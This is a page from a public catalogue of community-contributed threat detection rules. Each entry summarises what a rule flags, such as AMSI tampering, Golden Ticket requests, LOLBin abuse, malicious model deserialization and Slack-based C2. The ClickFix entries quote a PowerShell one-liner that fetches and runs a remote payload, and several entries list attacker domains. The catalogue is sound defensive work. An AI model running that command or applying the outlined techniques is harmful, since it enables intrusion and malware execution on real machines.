Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
39,252 detections
Filters
Last updated
All Time
Detection languages
14,996
13,546
2,513
1,803
1,722
Contributors
7,678
6,007
5,306
4,504
4,026
Categories
17,755
9,465
3,749
3,677
3,674
Platforms
39,252
6,892
6,432
3,782
3,524
Products / Services
10,159
9,415
6,493
1,858
1,706
MITRE Techniques
13,649
12,957
7,908
5,843
4,364
CVEs
50
45
30
30
29
IDS Classtypes
214
56
36
24
19
IDS Protocols
177
171
20
17
8
Detects anomalous, high-volume HTTP requests to AI agent orchestration endpoints (e.g., tool invocation, plugins, or webhooks) followed by suspicious process execution or outbound network connections from the same host. This behavior is indicative of RCE exploitation against an AI agent framework, such as insecure deserialization or SSRF within a plugin connector.
Detects the presence of a specific, hardcoded Ed25519 public key associated with malicious cross-platform payloads (npm, Go modules, Terraform providers) that use Slack for C2 communication.
Detects the creation of scheduled tasks, recurring jobs, or webhook subscriptions by a user identity flagged as an AI_AGENT. This activity is monitored for persistence, especially when the event lacks a descriptive context or targets external networks, suggesting potential unauthorized agent behavioral drift or malicious persistence.
Detects suspicious network connectivity where a newly executed process (that is not a browser or Slack) immediately establishes an outbound HTTPS connection to the Slack API. This behavior is indicative of potential malware implants or malicious scripts attempting to perform system reconnaissance and check-in to an attacker-controlled Slack workspace.
This rule detects the suspicious use of signed Windows binaries (rundll32.exe, regsvr32.exe, mshta.exe, msiexec.exe) to execute remote content via URLs or scripts, or when triggered by common office applications and browsers. This behavior is often indicative of living-off-the-land (LotL) techniques used for download/execution of payloads or bypassing security controls.
Detects attempts to bypass or tamper with the Antimalware Scan Interface (AMSI). This rule monitors for command-line arguments indicative of reflection-based patching of AmsiUtils and forced AmsiScanBuffer failures, as well as registry modifications to AMSI providers.
Detects the execution of PowerShell with suspicious command-line patterns indicative of obfuscation or malicious intent, including encoded commands, Base64 decoding, IEX combined with common download cmdlets, and specific obfuscation techniques like backtick concatenation, character casting, or variable concatenation.
Detects anomalous Kerberos ticket requests that are characteristic of Golden Ticket attacks. The rule flags the use of weak encryption types (e.g., RC4) commonly used in forged tickets even in AES-enforced environments, and direct requests for the KRBTGT service account outside of legitimate ticket renewal operations.
Detects the execution of known Living-off-the-Land Binaries (LOLBins) such as mshta, certutil, regsvr32, rundll32, and msiexec, where the command-line arguments contain suspicious patterns indicative of script execution or remote file fetching. These behaviors are consistent with T1218 (System Binary Proxy Execution) to bypass security controls by utilizing trusted, signed binaries to execute malicious code.
This rule detects potential Kerberos Golden Ticket activity by monitoring Windows Event IDs 4768 (TGT Request) and 4769 (TGS Request) for indicators of forgery. Specifically, it flags TGT requests that utilize RC4 encryption ('0x17') in environments where AES is expected, excluding standard krbtgt account activity.
This rule detects the creation of services or execution of processes associated with remote management tools like PsExec or PAExec. It looks for common service names (PSEXESVC, PAExec), suspicious executable paths in temporary directories (e.g., \Temp\, \AppData\Local\Temp\), or command-line patterns indicating remote execution via ADMIN$ shares. These indicators are frequently used by adversaries for lateral movement and remote command execution.
Detects instances where the system DNS process (dns.exe) on a domain controller performs recursive DNS resolution towards a set of external IP addresses associated with suspicious infrastructure (AS202412). The rule correlates this activity with recent network connections from common web browsers or system utilities (msedge.exe, svchost.exe) on the same host to identify potential proxying of malicious DNS queries.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
Sweeps DeviceFileEvents, DeviceProcessEvents, and DeviceNetworkEvents over a rolling 30-day window for known RevStealer indicators: exact SHA-256 matches against all 13 published file hashes, and exact-host matches (via parsed URL host, not substring) against the confirmed C2 domain meta7.archscreen68.one. An empty, extensible IP list is included for when a malicious IP is published.
Detects instances where machine learning runtime processes (e.g., Python, torch-model-loader) load serialized model files (e.g., .pkl, .joblib, .pth) and subsequently spawn suspicious child processes like command shells, scripting engines, or download utilities. This behavior is indicative of arbitrary code execution via unsafe deserialization of a malicious model artifact.
Detects high-volume outbound transfers of sensitive machine learning artifacts, such as model files, training datasets, and model registries, to unauthorized external destinations like personal email or unmanaged cloud storage. This behavior is indicative of potential intellectual property theft.
Detects the execution of known Remote Monitoring and Management (RMM) tool binaries (ScreenConnect, AnyDesk, Atera) that are initiated by suspicious parent processes such as browsers, scripting hosts, or office applications, or run from non-standard locations. This behavior is indicative of threat actors deploying trojanized RMM tools to establish a covert command-and-control channel that blends into normal IT administrative traffic.
Detects suspicious cross-process access (Sysmon Event ID 10) and remote thread creation (Sysmon Event ID 8) targeting sensitive processes such as lsass.exe, svchost.exe, and explorer.exe, which are indicative of process injection or hollowing techniques used for evasion or persistence.
Page 93 of 1870


